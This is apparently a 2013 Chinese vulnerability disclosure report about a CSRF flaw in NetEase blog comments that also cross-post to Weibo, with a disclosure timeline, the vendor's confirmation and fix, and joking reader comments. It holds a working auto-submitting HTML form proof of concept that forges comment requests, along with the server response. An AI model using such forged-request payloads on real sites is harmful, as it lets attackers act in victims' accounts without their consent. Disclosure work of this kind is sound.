2013-03-22: 细节已通知厂商并且等待厂商处理中 2013-03-25: 厂商已经确认,细节仅向厂商公开 2013-04-04: 细节向核心白帽子及相关领域专家公开 2013-04-14: 细节向普通白帽子公开 2013-04-24: 细节向实习白帽子公开 2013-05-06: 细节向公众公开
GIFT!
1)问题缺陷在网易博客的回复功能,该处功能会同步到网易微博,未校验referer;
2)登录网易博客,运行以下POC;
<html><body><form id="se55i0n" name="se55i0n" action="http://api.blog.163.com/lli.vip/dwr/call/plaincall/BlogBeanNew.addBlogComment.dwr" method="POST"><input type="text" name="callCount" value="1" /><input type="text" name="scriptSessionId" value="${scriptSessionId}187" /><input type="text" name="c0-scriptName" value="BlogBeanNew" /><input type="text" name="c0-methodName" value="addBlogComment" /><input type="text" name="c0-id" value="0" /><input type="text" name="c0-e1" value="string:fks_087065080081084067086083081071072087083074083095081070093" /><input type="text" name="c0-e2" value="number:12979759" /><input type="text" name="c0-e3" value="string:" /><input type="text" name="c0-e4" value="string:ddd" /><input type="text" name="c0-e5" value="string:i_majia" /><input type="text" name="c0-e6" value="string:" /><input type="text" name="c0-e7" value="number:-1" /><input type="text" name="c0-e8" value="number:-1" /><input type="text" name="c0-e9" value="number:12979759" /><input type="text" name="c0-e10" value="string:lli.vip" /><input type="text" name="c0-e11" value="string:%E6%9D%8E%E9%BB%8E" /><input type="text" name="c0-e12" value="boolean:true" /><input type="text" name="c0-param0" value="Object_Object:{blogId:reference:c0-e1,blogUserId:reference:c0-e2,blogTitle:reference:c0-e3,content:reference:c0-e4,publisherNickname:reference:c0-e5,publisherEmail:reference:c0-e6,mainComId:reference:c0-e7,replyComId:reference:c0-e8,replyToUserId:reference:c0-e9,replyToUserName:reference:c0-e10,replyToUserNick:reference:c0-e11,synchMiniBlog:reference:c0-e12}" /><input type="text" name="c0-param1" value="string:" /><input type="text" name="c0-param2" value="boolean:false" /><input type="text" name="batchId" value="675126" /><input type="submit" value="submit"></form><script> document.se55i0n.submit();</script></body></html>
其中参数"c0-e4"的值即为回复内容;3)运行POC系统返回结果如下;
//#DWR-INSERT//#DWR-REPLYvar s0=[];dwr.engine._remoteHandleCallback('675126','0',{'abstract':"ddd",blogId:"fks_087065080081084067086083081071072087083074083095081070093",blogPermalink:"blog/static/129797592013126105133453",blogTitle:"\u996E\u98DF\u5F80\u4E8B\uFF082\uFF09",blogUserId:12979759,blogUserName:"lli.vip",circleId:0,circleName:null,circleUrlName:null,content:"ddd",id:"fks_095066085082084075093080084095085084088068093081083074",ip:"113.205.155.197",ipName:"\u91CD\u5E86 ",lastUpdateTime:1363878263025,mainComId:"-1",moveFrom:null,popup:false,publishTime:1363878263041,publishTimeStr:"23:04:23",publisherAvatar:0,publisherAvatarUrl:"http://img.bimg.126.net/photo/hmZoNQaqzZALvVp0rE7faA==/0.jpg",publisherEmail:"",publisherId:218104121,publisherName:"majiagege",publisherNickname:"i_majia",publisherUrl:null,replyComId:"-1",replyToUserId:12979759,replyToUserName:"lli.vip",replyToUserNick:"\u674E\u9ECE",shortPublishDateStr:"2013-3-21",spam:0,subComments:s0,synchMiniBlog:true,valid:0});
4)返回微博站点,刷新微博,查看效果;
见详细说明
校验referer,加入token
危害等级:中
漏洞Rank:8
确认时间:2013-03-25 11:03
感谢您对网易的关注,漏洞已经修复。
暂无
围观
楼主也已经不能用变态来形容了
@x1aoh4i 楼主变态?
@x1aoh4i @带馅儿馒头 谁淫荡呀,你淫荡,,,
洞主这是要逆天啊。。。啊。。。。啊。。。。。
( 核心白帽子 | Rank:2179 漏洞数:330 | 呵呵!)